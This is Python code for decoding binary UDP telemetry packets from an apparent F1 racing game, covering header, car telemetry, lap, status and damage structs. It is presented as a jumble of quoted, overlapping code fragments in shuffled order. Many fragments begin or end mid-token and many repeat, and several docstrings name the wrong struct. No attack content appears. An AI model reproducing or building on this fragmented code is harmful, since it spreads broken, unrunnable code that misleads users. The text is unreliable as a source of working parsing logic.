CarTelemetryData.from_unpacked( unpacked_wo_header[ i * len(CAR_TELEMETRY_DATA_FORMAT) : (i", "ctypes.c_uint8 m_rev_lights_bit_value: ctypes.c_uint16 m_brakes_temperature: List[ctypes.c_uint16] m_tyres_surface_temperature: List[ctypes.c_uint8] m_tyres_inner_temperature: List[ctypes.c_uint8] m_engine_temperature: ctypes.c_uint16 m_tyres_pressure: List[ctypes.c_float]", "@classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary UDP package.", "lap data for each active car data_list = list() for i in range(22):", "str, message_type: object, ): \"\"\"Create class form binary UDP package. Args: packet_header (PacketHeader):", "attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_inner_temperature\") #", "unpacked[17], unpacked[18], unpacked[19], unpacked[20], unpacked[21], ) @dataclass class PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carStatusData: List[CarStatusData]", "on car (fl, fr, rl, rr). Args: telemetry_values(list): List of telemetry values that", "= struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(message_format * 22), binary_message, ) # Remove header from", "@dataclass class CarDamageData: \"\"\"CarStatusData struct.\"\"\" m_tyresWear: ctypes.c_float m_tyresDamage: ctypes.c_uint8 m_brakesDamage: ctypes.c_uint8 @classmethod def", "temperature values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"],", "-> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values = (", "| player_car_telemetry.__dict__.copy() ) # Map tyre temperature values from list to attributes player_telemetry_message", "unpacked[5], unpacked[6], unpacked[7], unpacked[13], unpacked[15], unpacked[17], unpacked[18], unpacked[19], unpacked[20], unpacked[21], ) @dataclass class", "Args: binary_message (str): Binary representation of package header. \"\"\" format_string = \"<HBBBBQfLBB\" unpacked", "PacketHeader: \"\"\"PacketHeader struct.\"\"\" m_packet_format: ctypes.c_uint16 m_game_major_version: ctypes.c_uint8 m_game_minor_version: ctypes.c_uint8 m_packet_version: ctypes.c_uint8 m_packet_id: ctypes.c_uint8", "list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\", ) )", "struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get lap data for each active", "List[CarStatusData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary UDP", "all attributes to construct CarTelemetryData class. \"\"\" return cls( list([unpacked[0], unpacked[1], unpacked[2], unpacked[3]]),", "binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData ) return cls(packet_header, car_damage_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data", "m_ersHarvestedThisLapMGUH: ctypes.c_float m_ersDeployedThisLap: ctypes.c_float @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into", "unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], list([unpacked[10], unpacked[11], unpacked[12], unpacked[13]]), list([unpacked[14],", "cls(packet_header, lap_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index =", "player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\", ) ) player_car_damage_message.pop(\"m_tyresDamage\") # Map brake damage values", "key_name = str(attribute_name) + \"_\" + car_position_mapping[i] telemetry_values_dict[key_name] = telemetry_value return telemetry_values_dict @dataclass", "= self.m_header.m_player_car_index player_car_damage = self.m_carDamageData[player_car_index] player_car_damage_message = ( self.m_header.__dict__ | player_car_damage.__dict__.copy() ) #", "m_rev_lights_percent: ctypes.c_uint8 m_rev_lights_bit_value: ctypes.c_uint16 m_brakes_temperature: List[ctypes.c_uint16] m_tyres_surface_temperature: List[ctypes.c_uint8] m_tyres_inner_temperature: List[ctypes.c_uint8] m_engine_temperature: ctypes.c_uint16 m_tyres_pressure:", "def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary UDP package. Args:", "ctypes.c_int8 @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary UDP", "m_drs: ctypes.c_uint8 m_rev_lights_percent: ctypes.c_uint8 m_rev_lights_bit_value: ctypes.c_uint16 m_brakes_temperature: List[ctypes.c_uint16] m_tyres_surface_temperature: List[ctypes.c_uint8] m_tyres_inner_temperature: List[ctypes.c_uint8] m_engine_temperature:", ") ) player_telemetry_message.pop(\"m_tyres_surface_temperature\") # Map tyre inner temperature values from list to attributes", "-> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_damage = self.m_carDamageData[player_car_index]", "@classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class attributes. Args: unpacked", "= \"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT = \"BBb\" CAR_TELEMETRY_DATA_FORMAT = \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT = \"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT =", ") return cls(packet_header, car_status_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\"", "binary UDP package. Args: binary_message (str): Binary representation of package header. \"\"\" format_string", "\"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT = \"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def _telemetry_list_to_attributes(telemetry_values: list, attribute_name: str) -> dict: \"\"\"Get single", "struct import ctypes from dataclasses import dataclass, asdict from typing import List PACKET_HEADER_FORMAT", "asdict from typing import List PACKET_HEADER_FORMAT = \"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT = \"BBb\" CAR_TELEMETRY_DATA_FORMAT =", "= struct.unpack_from(format_string, binary_message) return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7],", "Get telemetry for each active car car_telemetry_data_list = list() for i in range(22):", "Map tyre wear values from list to attributes player_car_damage_message = ( player_car_damage_message |", "ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class attributes. Args:", "class LapData: \"\"\"LapData struct.\"\"\" m_lastLapTimeInMS: ctypes.c_uint32 m_currentLapTimeInMS: ctypes.c_uint32 m_sector1TimeInMS: ctypes.c_uint16 m_sector2TimeInMS: ctypes.c_uint16 m_lapDistance:", "class CarDamageData: \"\"\"CarStatusData struct.\"\"\" m_tyresWear: ctypes.c_float m_tyresDamage: ctypes.c_uint8 m_brakesDamage: ctypes.c_uint8 @classmethod def from_unpacked(cls,", "unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[8] ) @dataclass class PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData struct.\"\"\" m_lap_data:", "from typing import List PACKET_HEADER_FORMAT = \"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT = \"BBb\" CAR_TELEMETRY_DATA_FORMAT = \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\"", "ctypes.c_uint16 m_brakes_temperature: List[ctypes.c_uint16] m_tyres_surface_temperature: List[ctypes.c_uint8] m_tyres_inner_temperature: List[ctypes.c_uint8] m_engine_temperature: ctypes.c_uint16 m_tyres_pressure: List[ctypes.c_float] m_surface_type: List[ctypes.c_uint8]", "unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], ) @dataclass class PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData struct.\"\"\" m_header:", "| self.m_carStatusData[player_car_index].__dict__.copy() ) return player_values @dataclass class CarDamageData: \"\"\"CarStatusData struct.\"\"\" m_tyresWear: ctypes.c_float m_tyresDamage:", ": (i + 1) * len(CAR_TELEMETRY_DATA_FORMAT) ] ) car_telemetry_data_list.append(car_telemetry_data) return cls( packet_header, car_telemetry_data_list,", ") # Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get", "tyre temperature values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes(", "str) -> dict: \"\"\"Get single attributes from attributes list and allocate to position", "lap_data_list = cls.get_message_list( packet_header, binary_message, LAP_DATA_FORMAT, LapData ) return cls(packet_header, lap_data_list) def get_player_car_data(self)", "| self.m_lap_data[player_car_index].__dict__.copy() ) return player_values @dataclass class CarStatusData: \"\"\"CarStatusData struct.\"\"\" m_fuelInTank: ctypes.c_float m_fuelCapacity:", "unpacked[4], unpacked[8] ) @dataclass class PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData struct.\"\"\" m_lap_data: List[LapData] @classmethod def from_binary(cls,", "PACKET_CAR_TELEMETRY_DATA_FORMAT = \"BBb\" CAR_TELEMETRY_DATA_FORMAT = \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT = \"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT = \"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT", "of package header. \"\"\" format_string = \"<HBBBBQfLBB\" unpacked = struct.unpack_from(format_string, binary_message) return cls(", "str, message_format: str, message_type: object, ): \"\"\"Create class form binary UDP package. Args:", "(str): Binary representation of struct. \"\"\" lap_data_list = cls.get_message_list( packet_header, binary_message, LAP_DATA_FORMAT, LapData", "] ) car_telemetry_data_list.append(car_telemetry_data) return cls( packet_header, car_telemetry_data_list, unpacked_wo_header[-3], unpacked_wo_header[-2], unpacked_wo_header[-1], ) def get_player_car_data(self)", "header. \"\"\" format_string = \"<HBBBBQfLBB\" unpacked = struct.unpack_from(format_string, binary_message) return cls( unpacked[0], unpacked[1],", "unpacked[7], unpacked[8], unpacked[9], ) @dataclass class PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData struct.\"\"\" m_header: PacketHeader @classmethod def", ") # Map tyre wear values from list to attributes player_car_damage_message = (", ") player_car_damage_message.pop(\"m_tyresDamage\") # Map brake damage values from list to attributes player_car_damage_message =", "data from binary format and extract player data.\"\"\" import struct import ctypes from", "unpacked[21], ) @dataclass class PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carStatusData: List[CarStatusData] @classmethod def from_binary(cls, packet_header:", "unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], list([unpacked[10], unpacked[11], unpacked[12], unpacked[13]]), list([unpacked[14], unpacked[15], unpacked[16],", "of struct. \"\"\" lap_data_list = cls.get_message_list( packet_header, binary_message, LAP_DATA_FORMAT, LapData ) return cls(packet_header,", "22), binary_message, ) # Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :]", "from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_carStatusData[player_car_index].__dict__.copy() )", "of telemetry values that should be mapped to attributes. attribute_name(str): Attribute name used", "= telemetry_value return telemetry_values_dict @dataclass class PacketHeader: \"\"\"PacketHeader struct.\"\"\" m_packet_format: ctypes.c_uint16 m_game_major_version: ctypes.c_uint8", "ctypes.c_float m_fuelCapacity: ctypes.c_float m_fuelRemainingLaps: ctypes.c_float m_actualTyreCompound: ctypes.c_uint8 m_tyresAgeLaps: ctypes.c_uint8 m_ersStoreEnergy: ctypes.c_float m_ersDeployMode: ctypes.c_uint8", "attributes. Args: unpacked (list): Unpacked struct containing all attributes to construct CarTelemetryData class.", "player_car_index = self.m_header.m_player_car_index player_car_damage = self.m_carDamageData[player_car_index] player_car_damage_message = ( self.m_header.__dict__ | player_car_damage.__dict__.copy() )", "from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\", )", "unpacked[3], unpacked[4], unpacked[8] ) @dataclass class PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData struct.\"\"\" m_lap_data: List[LapData] @classmethod def", "( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\", ) ) player_car_damage_message.pop(\"m_tyresDamage\") # Map brake damage", "binary UDP package. Args: packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary representation of", "import List PACKET_HEADER_FORMAT = \"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT = \"BBb\" CAR_TELEMETRY_DATA_FORMAT = \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT =", "from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\", )", "enumerate(telemetry_values): key_name = str(attribute_name) + \"_\" + car_position_mapping[i] telemetry_values_dict[key_name] = telemetry_value return telemetry_values_dict", "unpacked[6], unpacked[7], unpacked[8], unpacked[9], ) @dataclass class PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData struct.\"\"\" m_header: PacketHeader @classmethod", "package. Args: packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. \"\"\"", "of struct. \"\"\" # Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(message_format *", "unpacked[6], unpacked[7], unpacked[13], unpacked[15], unpacked[17], unpacked[18], unpacked[19], unpacked[20], unpacked[21], ) @dataclass class PacketCarStatusData(PacketWOAdditionalAttributes):", "unpacked[26]]), list([unpacked[27], unpacked[28], unpacked[29], unpacked[30]]), ) @dataclass class PacketCarTelemetryData: \"\"\"PacketCarTelemetryData struct.\"\"\" m_header: PacketHeader", "(PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" lap_data_list = cls.get_message_list(", "list([unpacked[4], unpacked[5], unpacked[6], unpacked[7]]), list([unpacked[8], unpacked[9], unpacked[10], unpacked[11]]), ) @dataclass class PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData", ") @dataclass class PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carDamageData: List[CarDamageData] @classmethod def from_binary(cls, packet_header: PacketHeader,", "class. \"\"\" return cls( unpacked[5], unpacked[6], unpacked[7], unpacked[13], unpacked[15], unpacked[17], unpacked[18], unpacked[19], unpacked[20],", "cls.get_message_list( packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData ) return cls(packet_header, car_damage_data_list) def get_player_car_data(self) -> dict:", "CAR_STATUS_DATA_FORMAT = \"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT = \"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def _telemetry_list_to_attributes(telemetry_values: list, attribute_name: str) -> dict:", "ctypes.c_uint8 m_packet_id: ctypes.c_uint8 m_session_uid: ctypes.c_uint64 m_session_time: ctypes.c_float m_frame_identifier: ctypes.c_uint32 m_player_car_index: ctypes.c_uint8 m_secondary_player_car_index: ctypes.c_uint8", ") # Map tyre temperature values from list to attributes player_telemetry_message = (", "dataclass, asdict from typing import List PACKET_HEADER_FORMAT = \"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT = \"BBb\" CAR_TELEMETRY_DATA_FORMAT", "ctypes.c_uint8 m_suggested_gear: ctypes.c_int8 @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form", "CarDamageData ) return cls(packet_header, car_damage_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player", "unpacked_wo_header[ i * len(message_format) : (i + 1) * len(message_format) ] ) data_list.append(data)", "cls( unpacked[5], unpacked[6], unpacked[7], unpacked[13], unpacked[15], unpacked[17], unpacked[18], unpacked[19], unpacked[20], unpacked[21], ) @dataclass", "tyre damage values from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes(", "class CarStatusData: \"\"\"CarStatusData struct.\"\"\" m_fuelInTank: ctypes.c_float m_fuelCapacity: ctypes.c_float m_fuelRemainingLaps: ctypes.c_float m_actualTyreCompound: ctypes.c_uint8 m_tyresAgeLaps:", "m_ersDeployMode: ctypes.c_uint8 m_ersHarvestedThisLapMGUK: ctypes.c_float m_ersHarvestedThisLapMGUH: ctypes.c_float m_ersDeployedThisLap: ctypes.c_float @classmethod def from_unpacked(cls, unpacked: List):", "get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_telemetry =", "Binary representation of struct. \"\"\" car_damage_data_list = cls.get_message_list( packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData )", "packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData ) return cls(packet_header, car_damage_data_list) def get_player_car_data(self) -> dict: \"\"\"Get", "ctypes.c_uint32 m_player_car_index: ctypes.c_uint8 m_secondary_player_car_index: ctypes.c_uint8 @classmethod def from_binary(cls, binary_message: str): \"\"\"Create class form", "\"_\" + car_position_mapping[i] telemetry_values_dict[key_name] = telemetry_value return telemetry_values_dict @dataclass class PacketHeader: \"\"\"PacketHeader struct.\"\"\"", "return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], )", "player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_surface_temperature\") # Map tyre inner temperature", "unpacked[28], unpacked[29], unpacked[30]]), ) @dataclass class PacketCarTelemetryData: \"\"\"PacketCarTelemetryData struct.\"\"\" m_header: PacketHeader m_car_telemetry_data: List[CarTelemetryData]", "binary_message (str): Binary representation of struct. \"\"\" car_status_data_list = cls.get_message_list( packet_header, binary_message, CAR_STATUS_DATA_FORMAT,", "= ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_surface_temperature\") # Map tyre", "= ( self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy() ) return player_values @dataclass class CarStatusData: \"\"\"CarStatusData struct.\"\"\"", "Map tyre temperature values from list to attributes player_telemetry_message = ( player_telemetry_message |", "m_fuelInTank: ctypes.c_float m_fuelCapacity: ctypes.c_float m_fuelRemainingLaps: ctypes.c_float m_actualTyreCompound: ctypes.c_uint8 m_tyresAgeLaps: ctypes.c_uint8 m_ersStoreEnergy: ctypes.c_float m_ersDeployMode:", "player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy() ) return player_values @dataclass", "values from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_brakesDamage\"], \"m_brakesDamage\",", "| _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\", ) ) player_car_damage_message.pop(\"m_tyresWear\") # Map tyre damage values from", "unpacked[24], unpacked[25], unpacked[26]]), list([unpacked[27], unpacked[28], unpacked[29], unpacked[30]]), ) @dataclass class PacketCarTelemetryData: \"\"\"PacketCarTelemetryData struct.\"\"\"", "return cls(packet_header, car_damage_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index", "car car_telemetry_data_list = list() for i in range(22): car_telemetry_data = CarTelemetryData.from_unpacked( unpacked_wo_header[ i", "cls.get_message_list( packet_header, binary_message, LAP_DATA_FORMAT, LapData ) return cls(packet_header, lap_data_list) def get_player_car_data(self) -> dict:", "get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_damage =", "player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_inner_temperature\") # Map brake temperature values from list to", "unpacked[17]]), list([unpacked[18], unpacked[19], unpacked[20], unpacked[21]]), unpacked[22], list([unpacked[23], unpacked[24], unpacked[25], unpacked[26]]), list([unpacked[27], unpacked[28], unpacked[29],", "return player_values @dataclass class CarStatusData: \"\"\"CarStatusData struct.\"\"\" m_fuelInTank: ctypes.c_float m_fuelCapacity: ctypes.c_float m_fuelRemainingLaps: ctypes.c_float", "CAR_STATUS_DATA_FORMAT, CarStatusData ) return cls(packet_header, car_status_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from", "= \"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT = \"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def _telemetry_list_to_attributes(telemetry_values: list, attribute_name: str) -> dict: \"\"\"Get", "unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], list([unpacked[10], unpacked[11], unpacked[12], unpacked[13]]), list([unpacked[14], unpacked[15],", "(str): Binary representation of struct. \"\"\" # Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT", "and allocate to position on car (fl, fr, rl, rr). Args: telemetry_values(list): List", "= CarTelemetryData.from_unpacked( unpacked_wo_header[ i * len(CAR_TELEMETRY_DATA_FORMAT) : (i + 1) * len(CAR_TELEMETRY_DATA_FORMAT) ]", "m_currentLapNum: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class attributes.", "class CarTelemetryData: \"\"\"CarTelemetryData struct.\"\"\" m_speed: ctypes.c_uint16 m_throttle: ctypes.c_float m_steer: ctypes.c_float m_brake: ctypes.c_float m_clutch:", "self.m_header.__dict__ | player_car_damage.__dict__.copy() ) # Map tyre wear values from list to attributes", "player_telemetry_message @dataclass class LapData: \"\"\"LapData struct.\"\"\" m_lastLapTimeInMS: ctypes.c_uint32 m_currentLapTimeInMS: ctypes.c_uint32 m_sector1TimeInMS: ctypes.c_uint16 m_sector2TimeInMS:", "struct.\"\"\" m_tyresWear: ctypes.c_float m_tyresDamage: ctypes.c_uint8 m_brakesDamage: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse", "from attributes list and allocate to position on car (fl, fr, rl, rr).", "\"\"\"CarTelemetryData struct.\"\"\" m_speed: ctypes.c_uint16 m_throttle: ctypes.c_float m_steer: ctypes.c_float m_brake: ctypes.c_float m_clutch: ctypes.c_uint8 m_gear:", "car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_carStatusData[player_car_index].__dict__.copy() ) return player_values", "binary_message (str): Binary representation of struct. \"\"\" car_damage_data_list = cls.get_message_list( packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT,", "list([unpacked[14], unpacked[15], unpacked[16], unpacked[17]]), list([unpacked[18], unpacked[19], unpacked[20], unpacked[21]]), unpacked[22], list([unpacked[23], unpacked[24], unpacked[25], unpacked[26]]),", "to attributes. attribute_name(str): Attribute name used as keys in dict. \"\"\" car_position_mapping =", "m_car_telemetry_data: List[CarTelemetryData] m_mfd_panel_index: ctypes.c_uint8 m_mfd_panel_index_secondary_player: ctypes.c_uint8 m_suggested_gear: ctypes.c_int8 @classmethod def from_binary(cls, packet_header: PacketHeader,", "ctypes.c_uint8 m_brakesDamage: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class", "player_telemetry_message.pop(\"m_brakes_temperature\") # Map tyres pressure values from list to attributes player_telemetry_message = (", "ctypes.c_uint16 m_drs: ctypes.c_uint8 m_rev_lights_percent: ctypes.c_uint8 m_rev_lights_bit_value: ctypes.c_uint16 m_brakes_temperature: List[ctypes.c_uint16] m_tyres_surface_temperature: List[ctypes.c_uint8] m_tyres_inner_temperature: List[ctypes.c_uint8]", "list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\", ) )", "should be mapped to attributes. attribute_name(str): Attribute name used as keys in dict.", "( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_inner_temperature\") # Map brake temperature", "return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[8] ) @dataclass class PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData", "for each active car data_list = list() for i in range(22): data =", "ctypes.c_uint16 m_sector2TimeInMS: ctypes.c_uint16 m_lapDistance: ctypes.c_uint32 m_currentLapNum: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse", "from_binary(cls, binary_message: str): \"\"\"Create class form binary UDP package. Args: binary_message (str): Binary", "\"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT = \"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT = \"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT = \"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def _telemetry_list_to_attributes(telemetry_values: list,", "List[ctypes.c_uint8] m_engine_temperature: ctypes.c_uint16 m_tyres_pressure: List[ctypes.c_float] m_surface_type: List[ctypes.c_uint8] @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse", "struct into class attributes. Args: unpacked (list): Unpacked struct containing all attributes to", "(fl, fr, rl, rr). Args: telemetry_values(list): List of telemetry values that should be", "(str): Binary representation of struct. \"\"\" car_damage_data_list = cls.get_message_list( packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData", "attributes. attribute_name(str): Attribute name used as keys in dict. \"\"\" car_position_mapping = [\"rl\",", "attribute_name(str): Attribute name used as keys in dict. \"\"\" car_position_mapping = [\"rl\", \"rr\",", "from binary format and extract player data.\"\"\" import struct import ctypes from dataclasses", "binary_message (str): Binary representation of struct. \"\"\" lap_data_list = cls.get_message_list( packet_header, binary_message, LAP_DATA_FORMAT,", "unpacked[3]]), list([unpacked[4], unpacked[5], unpacked[6], unpacked[7]]), list([unpacked[8], unpacked[9], unpacked[10], unpacked[11]]), ) @dataclass class PacketCarDamageData(PacketWOAdditionalAttributes):", "format_string = \"<HBBBBQfLBB\" unpacked = struct.unpack_from(format_string, binary_message) return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3],", "player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\", ) ) player_car_damage_message.pop(\"m_tyresWear\") # Map tyre damage values", "ctypes.c_uint16 m_tyres_pressure: List[ctypes.c_float] m_surface_type: List[ctypes.c_uint8] @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct", "into class attributes. Args: unpacked (list): Unpacked struct containing all attributes to construct", "get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values =", "rl, rr). Args: telemetry_values(list): List of telemetry values that should be mapped to", "= \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT = \"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT = \"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT = \"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def _telemetry_list_to_attributes(telemetry_values:", "m_actualTyreCompound: ctypes.c_uint8 m_tyresAgeLaps: ctypes.c_uint8 m_ersStoreEnergy: ctypes.c_float m_ersDeployMode: ctypes.c_uint8 m_ersHarvestedThisLapMGUK: ctypes.c_float m_ersHarvestedThisLapMGUH: ctypes.c_float m_ersDeployedThisLap:", "keys in dict. \"\"\" car_position_mapping = [\"rl\", \"rr\", \"fl\", \"fr\"] telemetry_values_dict = {}", "Unpacked struct containing all attributes to construct CarTelemetryData class. \"\"\" return cls( unpacked[0],", "car_position_mapping = [\"rl\", \"rr\", \"fl\", \"fr\"] telemetry_values_dict = {} for i, telemetry_value in", "struct. \"\"\" # Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(CAR_TELEMETRY_DATA_FORMAT * 22)", "binary_message: str): \"\"\"Create class form binary UDP package. Args: packet_header (PacketHeader): PacketHeader class.", "# Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get telemetry", "Map tyre inner temperature values from list to attributes player_telemetry_message = ( player_telemetry_message", "i * len(message_format) : (i + 1) * len(message_format) ] ) data_list.append(data) return", "PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carDamageData: List[CarDamageData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create", "# Map tyre damage values from list to attributes player_car_damage_message = ( player_car_damage_message", "\"\"\" # Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(CAR_TELEMETRY_DATA_FORMAT * 22) +", "of struct. \"\"\" car_status_data_list = cls.get_message_list( packet_header, binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData ) return cls(packet_header,", "for i, telemetry_value in enumerate(telemetry_values): key_name = str(attribute_name) + \"_\" + car_position_mapping[i] telemetry_values_dict[key_name]", "list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\", ) )", "+ car_position_mapping[i] 